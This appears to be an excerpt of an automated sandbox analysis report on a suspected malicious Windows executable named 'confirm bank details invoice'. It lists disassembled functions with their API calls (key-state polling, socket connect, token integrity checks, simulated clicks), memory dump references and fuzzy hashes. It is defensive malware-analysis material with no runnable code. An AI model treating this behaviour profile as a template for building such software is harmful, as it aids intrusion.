                    • Instruction Fuzzy Hash: D641A675D00106ABDB14DF68CCA4FA6BB66EB09310F140267E959E73D1C738AD12D698
                    Function 004C1206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                    Download Yara Rule
                    APIs
                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004C12B4
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 004C12DD
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 004C131C
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 004C1341
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004C1349
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • String ID:
                    • API String ID: 1389676194-0
                    • Opcode ID: f0382a4f6d9807cfa53d386a379acd5be5c2f51e95b91a35d4fe8bcc77d46751
                    • Instruction ID: 225eed964eec3944e24b100e1a4a1f271934d3e86099e0917c82d616b85479fd
                    • Opcode Fuzzy Hash: f0382a4f6d9807cfa53d386a379acd5be5c2f51e95b91a35d4fe8bcc77d46751
                    • Instruction Fuzzy Hash: 62411E35A00105DFDB01EF65C981AAEBBF5FF09314B14C0AAE90AAB362CB35ED11DB54
                    Function 0048B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetCursorPos.USER32(000000FF), ref: 0048B64F
                    • ScreenToClient.USER32(00000000,000000FF), ref: 0048B66C
                    • GetAsyncKeyState.USER32(00000001), ref: 0048B691
                    • GetAsyncKeyState.USER32(00000002), ref: 0048B69F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
                    • Opcode ID: dd11579d3dfdc6fb16cc10c91e156269f4628e90c945dbbe509d838b8f02f508
                    • Instruction ID: a4a5ac1e8625283cadda1a9c4e0cf115919c4a897112c14d7e03041984fbbf08
                    • Opcode Fuzzy Hash: dd11579d3dfdc6fb16cc10c91e156269f4628e90c945dbbe509d838b8f02f508
                    • Instruction Fuzzy Hash: 5B418E31904115BFDF15DF65C844AEEBB74FB05324F20435BE829A6290DB38AD90EF9A
                    Function 004AB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 004AB369
                    • PostMessageW.USER32(?,00000201,00000001), ref: 004AB413
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 004AB41B
                    • PostMessageW.USER32(?,00000202,00000000), ref: 004AB429
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 004AB431
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • String ID:
                    • API String ID: 3382505437-0
                    • Opcode ID: e3fc10e46999cba178fde3a451984e51cdef992e7913530b554878e30ead46a8
                    • Instruction ID: 8f4e3b8616bd9e1564da964260862b6fbb5752ae48989b99a237b09bcbec0db3
                    • Opcode Fuzzy Hash: e3fc10e46999cba178fde3a451984e51cdef992e7913530b554878e30ead46a8
                    • Instruction Fuzzy Hash: 1D31C071900219EBDF04CF68DD4DAAE3BB5EB15319F10422AF821EA2D2C7B49914DB95
                    Function 004ADBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsWindowVisible.USER32(?), ref: 004ADBD7
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004ADBF4
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004ADC2C
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004ADC52
                    • _wcsstr.LIBCMT ref: 004ADC5C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • String ID:
                    • API String ID: 3902887630-0
                    • Opcode ID: 647a3eba3e55ed10656a35fba6dc6c095d5d49820b7a1bf2c7672ff853eca657
                    • Instruction ID: 021e3ee3f6c9b068d33026cba94978436985dfa790f89130194ef9793c0d9a53
                    • Opcode Fuzzy Hash: 647a3eba3e55ed10656a35fba6dc6c095d5d49820b7a1bf2c7672ff853eca657
                    • Instruction Fuzzy Hash: 7321F571A04100BBEB155B299C49E7F7BA9DF56760F10403BF80ACA191EAA9DC01D268
                    Function 004ABC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004ABC90
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004ABCC2
                    • __itow.LIBCMT ref: 004ABCDA
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004ABD00
                    • __itow.LIBCMT ref: 004ABD11
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$__itow
                    • String ID:
                    • API String ID: 3379773720-0
                    • Opcode ID: bc305306ec1faa8f2057638da31b7055a37730ff3ff3e526f685518e7c100931
                    • Instruction ID: 5429248e01817962febf5b4aea82be6def09f7d8d790e692ac67a8d47b1ea7bf
                    • Opcode Fuzzy Hash: bc305306ec1faa8f2057638da31b7055a37730ff3ff3e526f685518e7c100931
                    • Instruction Fuzzy Hash: EC21C935A003187ADB10AA658C45FDF7A69EF6B724F00402AF905EB192DB78890587E9
                    Function 004B6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004750E6: _wcsncpy.LIBCMT ref: 004750FA
                    • GetFileAttributesW.KERNEL32(?,?,?,?,004B60C3), ref: 004B6369
                    • GetLastError.KERNEL32(?,?,?,004B60C3), ref: 004B6374
                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004B60C3), ref: 004B6388
                    • _wcsrchr.LIBCMT ref: 004B63AA
                      • Part of subcall function 004B6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,004B60C3), ref: 004B63E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                    • String ID:
                    • API String ID: 3633006590-0
                    • Opcode ID: 72adf8a6262dd300e73f5f8cdc0399fcc8533622c4f9ef86d7356f7beca7ba99
                    • Instruction ID: 140593ea64a9e21e786187dafbcaae25ba4bcb87aaa09afe00eeb149a05bcf8e
                    • Opcode Fuzzy Hash: 72adf8a6262dd300e73f5f8cdc0399fcc8533622c4f9ef86d7356f7beca7ba99
                    • Instruction Fuzzy Hash: F12101309042049ADB10AB78AC46FEE33ECAF19360F11147BF805D31C0EAAC99848A7D
                    Function 004C8B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004CA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 004CA84E
                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004C8BD3
                    • WSAGetLastError.WSOCK32(00000000), ref: 004C8BE2
                    • connect.WSOCK32(00000000,?,00000010), ref: 004C8BFE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorLastconnectinet_addrsocket
                    • String ID:
                    • API String ID: 3701255441-0
                    • Opcode ID: 3b3f12df293e242d8d4dbaead8abdac2767eb1968c36cb8ff71b358be54eede8
                    • Instruction ID: 08fb509cc47ecbaac11260ee077c1ce52023faf8b7459d7155c842476d653c56
                    • Opcode Fuzzy Hash: 3b3f12df293e242d8d4dbaead8abdac2767eb1968c36cb8ff71b358be54eede8
                    • Instruction Fuzzy Hash: 58219D356002149FCB10AB69C985FBE77E9AF48714F04845EF956AB392CB78AC018B69
                    Function 004C8420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                    • IsWindow.USER32(00000000), ref: 004C8441
                    • GetForegroundWindow.USER32 ref: 004C8458
                    • GetDC.USER32(00000000), ref: 004C8494
                    • GetPixel.GDI32(00000000,?,00000003), ref: 004C84A0
                    • ReleaseDC.USER32(00000000,00000003), ref: 004C84DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$ForegroundPixelRelease
                    • String ID:
                    • API String ID: 4156661090-0
                    • Opcode ID: 645b2b467b296d8be34ee3e0312aa82f0d460eda2d684a64e3693d78be0bc9a4
                    • Instruction ID: c61025e0d041f316fd469a7264e2965ec15e42bdc180d1b793677ab44a0e32c0
                    • Opcode Fuzzy Hash: 645b2b467b296d8be34ee3e0312aa82f0d460eda2d684a64e3693d78be0bc9a4
                    • Instruction Fuzzy Hash: 1921A435A00204AFD704EFA5C944AAEB7F9EF48305F04847EE849D7351DB74AC01CB68
                    Function 0048AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0048AFE3
                    • SelectObject.GDI32(?,00000000), ref: 0048AFF2
                    • BeginPath.GDI32(?), ref: 0048B009
                    • SelectObject.GDI32(?,00000000), ref: 0048B033
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: d539d66a72fe75ef20eb885ac52864627348826dcc749b56e15054f6b15fc609
                    • Instruction ID: 21f9c1aad17734ab3c3020c50acb2e4e162407b06e236d23f7404589295dfb8c
                    • Opcode Fuzzy Hash: d539d66a72fe75ef20eb885ac52864627348826dcc749b56e15054f6b15fc609
                    • Instruction Fuzzy Hash: 1921B270800704EFDB10AFE5ED497AE3B69F721355F14462BE520923A0C3744859EBAD
                    Function 0049217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                    Download Yara Rule
                    APIs
                    • __calloc_crt.LIBCMT ref: 004921A9
                    • CreateThread.KERNEL32(?,?,004922DF,00000000,?,?), ref: 004921ED
                    • GetLastError.KERNEL32 ref: 004921F7
                    • _free.LIBCMT ref: 00492200
                    • __dosmaperr.LIBCMT ref: 0049220B
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                    • String ID:
                    • API String ID: 2664167353-0
                    • Opcode ID: 32df624f870a6c8d1c8c4aaee0d156c61dd8a2792f3a6df108be50b5a8a33192
                    • Instruction ID: 008f8e2488a3bf5bb935e70a0f5e53cfc5ea31591270334037565f63fae3b8f1
                    • Opcode Fuzzy Hash: 32df624f870a6c8d1c8c4aaee0d156c61dd8a2792f3a6df108be50b5a8a33192
                    • Instruction Fuzzy Hash: F41108321043067F9F11AFA6DD42DAB3F99EF05774710003FF91496192DBB9D8118BA9
                    Function 004AABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004AABD7
                    • GetLastError.KERNEL32(?,004AA69F,?,?,?), ref: 004AABE1
                    • GetProcessHeap.KERNEL32(00000008,?,?,004AA69F,?,?,?), ref: 004AABF0
                    • HeapAlloc.KERNEL32(00000000,?,004AA69F,?,?,?), ref: 004AABF7
                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004AAC0E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 842720411-0
                    • Opcode ID: 7546b07c59e4950bd4c72b90959fc41ed357c4e8d1605cb1757f03e702249540
                    • Instruction ID: 5a33e339a2a1e8dd1b0338a43adf53843adde9bee4dd700827012f5703989c3d
                    • Opcode Fuzzy Hash: 7546b07c59e4950bd4c72b90959fc41ed357c4e8d1605cb1757f03e702249540
                    • Instruction Fuzzy Hash: B8011D71601204BFEB104FA5DC48D7B3BADEF8A765710042AF949C3250D7719D60DB69
                    Function 004B7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                    Download Yara Rule
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004B7A74
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004B7A82
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004B7A8A
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004B7A94
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004B7AD0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    • Opcode ID: a80b2147ee62a99f30245b279e93acf15467fa92109efe9926a37a1475e90f7c
                    • Instruction ID: 632984e8b63414abf721641a1e4b568c090262350b6860f2d2318980984d64b2
                    • Opcode Fuzzy Hash: a80b2147ee62a99f30245b279e93acf15467fa92109efe9926a37a1475e90f7c
                    • Instruction Fuzzy Hash: 95016931C08619EBCF00AFE5DD48AEEBB79FF4C701F004156E402B2250DB389660D7A9
                    Function 004A9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                    Download Yara Rule
                    APIs
                    • CLSIDFromProgID.OLE32 ref: 004A9ADC
                    • ProgIDFromCLSID.OLE32(?,00000000), ref: 004A9AF7
                    • lstrcmpiW.KERNEL32(?,00000000), ref: 004A9B05
                    • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 004A9B15
                    • CLSIDFromString.OLE32(?,?), ref: 004A9B21
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: From$Prog$FreeStringTasklstrcmpi
                    • String ID:
                    • API String ID: 3897988419-0
                    • Opcode ID: 11eeb7ab18b3d508d75c366c446bb0774c7eced9f71d10c7d5f379b6017d2710
                    • Instruction ID: 9c6631e8e22d121fb85ac6f141b24585de1918a53eed3c3ec08d82d5004d34ff
                    • Opcode Fuzzy Hash: 11eeb7ab18b3d508d75c366c446bb0774c7eced9f71d10c7d5f379b6017d2710
                    • Instruction Fuzzy Hash: 55018F76A00204BFDB105F54EC44BAA7AEEEB59392F244036F905D6210D774ED00DBB4
                    Function 004AAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004AAA79
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004AAA83
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004AAA92
                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004AAA99
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004AAAAF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 842846941998825f1b6ed404e9d6919e3db324b21947a6a76e359cf40dadc0a4
                    • Instruction ID: 10482d6b38a1d49dd895f2d9acc3b92800df36036969187bdfaef8ea5bdf6212
                    • Opcode Fuzzy Hash: 842846941998825f1b6ed404e9d6919e3db324b21947a6a76e359cf40dadc0a4
                    • Instruction Fuzzy Hash: 25F0C2316003046FEB111FA4EC88E773BADFF5A754F00002AF901C7290DB609C25DB65
                    Function 004AAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004AAADA
                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004AAAE4
                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004AAAF3
                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004AAAFA
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004AAB10
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 9ba5015b9f69da6531a6f191098e6056c6f8e8f394b899b6bdf707d9dfe645a7
                    • Instruction ID: 9bcb26ee56ddf1f90594ae24b13d33b6848defb1d0ddf04735989af6fdc154b9
                    • Opcode Fuzzy Hash: 9ba5015b9f69da6531a6f191098e6056c6f8e8f394b899b6bdf707d9dfe645a7
                    • Instruction Fuzzy Hash: 77F04F716012086FEB110FA4EC88E773B6EFF4A754F00003AFA41C7290CB64AC21DA75
                    Function 004AEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 004AEC94
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 004AECAB
                    • MessageBeep.USER32(00000000), ref: 004AECC3
                    • KillTimer.USER32(?,0000040A), ref: 004AECDF
                    • EndDialog.USER32(?,00000001), ref: 004AECF9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • String ID:
                    • API String ID: 3741023627-0
